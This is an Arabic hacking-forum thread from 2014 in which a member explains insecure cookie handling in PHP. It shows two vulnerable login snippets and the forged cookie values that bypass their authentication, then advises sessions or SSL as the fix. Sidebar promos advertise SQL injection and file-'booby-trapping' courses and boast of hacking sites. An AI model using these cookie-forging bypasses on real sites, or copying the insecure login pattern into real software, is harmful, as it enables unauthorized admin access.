1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ خبر ] ثغرات الكوكيز Insecure Cookie Handling

الموضوع في '[ الـثـغـرات ]' بواسطة V!P-Hero, بتاريخ ‏17 نوفمبر 2014.

كاتب الموضوع : V!P-Hero المشاهدات : 460 الردود : 3 ‏17 نوفمبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    V!P-Hero
    DeveloPer Plus

    عضو منذ:
    ‏27 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    الإقامة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    اللهم صل وسلم على سيدنا محمد وعلى آله وصحبه اجمعين

    اليوم درسنا عن ثغرات

    #Insecure Cookie Handling

    الكوكيز المحمية لابد ان ترسل من خلال SSL ويكمن الاكتشاف والتخطي من خلال وضع بروكسي لمشاهدة الطلبات

    ناخذ كود بسيط عشان توضح الصورة

    [PHP CODE] if($_POST['password'] == $thepass) {
    setcookie("is_user_logged","1");
    } else { die("Login failed!"); }
    ............ etc .................
    if($_COOKIE['is_user_logged']=="1")
    { include "admin.php"; else { die('not logged'); }[/PHP CODE]

    الان لو كتبنا is_user_logged في الكوكيز وحطينا قيمتها 1 راح نتخطى التسجيل ونتحول لصفحة admin
    ناخذ كود ثاني ونشوف

    [PHP CODE] if ($_COOKIE[PHPMYBCAdmin] == '') {[/PHP CODE][PHP CODE]
    if (!$_POST[login] == 'login') {
    die("Please Login:<BR><form method=post><input type=password
    name=password><input type=hidden value=login name=login><input
    type=submit></form>");
    } elseif($_POST[password] == $bcadminpass) {
    setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
    header("Location: admin.php"); } else { die("Incorrect"); }
    }[/PHP CODE]

    الكود السابق قابل للاستغلال لو خلينا الكوكي كالتالي

    كود PHP:
    "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie "1246371700; path=/"
    طريقة الاصلاح والترقيع
    استخدام SESSIONS بدل الكوكيز
    او نقلها عبر SSL
    الى هنا ينتهي الدرس القاكم في دروس اخرى باذن الله

     


    جاري تحميل الصفحة...
  2. غير متصل

    ✶ s c я є α м Developer SpyNote

    عضو منذ:
    ‏23 ديسمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    772
    نقاط الجائزة:
    الإقامة:

    رد: ثغرات الكوكيز Insecure Cookie Handling

    يعطيك الف الف عافيـه
     


  3. غير متصل

    M4r7h
    rank
    Developer

    عضو منذ:
    ‏18 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرات الكوكيز Insecure Cookie Handling

    مشششكؤر
     


  4. غير متصل

    coiffa
    rank
    Developer

    عضو منذ:
    ‏1 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرات الكوكيز Insecure Cookie Handling

    موضوع اكثر من رائع
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...